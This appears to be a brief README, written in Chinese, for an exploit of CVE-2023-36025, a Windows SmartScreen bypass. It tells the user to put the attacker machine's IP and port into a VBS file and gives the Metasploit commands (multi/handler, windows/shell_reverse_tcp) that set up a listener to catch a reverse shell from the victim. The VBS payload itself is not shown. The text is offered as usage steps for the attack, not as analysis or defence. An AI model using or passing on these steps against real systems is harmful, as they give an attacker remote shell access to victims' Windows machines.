[EXPLOIT] CVE-2023-36025 - 描述
Windows SmartScreen 安全功能绕过漏洞
使用
- 注意:handler 正在等待目标的 tcp 请求
- 附注:配置 CVE-2023-36025.vbs 文件,将 ip 和 port 改为机器正在用于 TCP handler 的 IP 和端口
- 配置反向 TCP handler
msfconsole
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST
set LPORT
run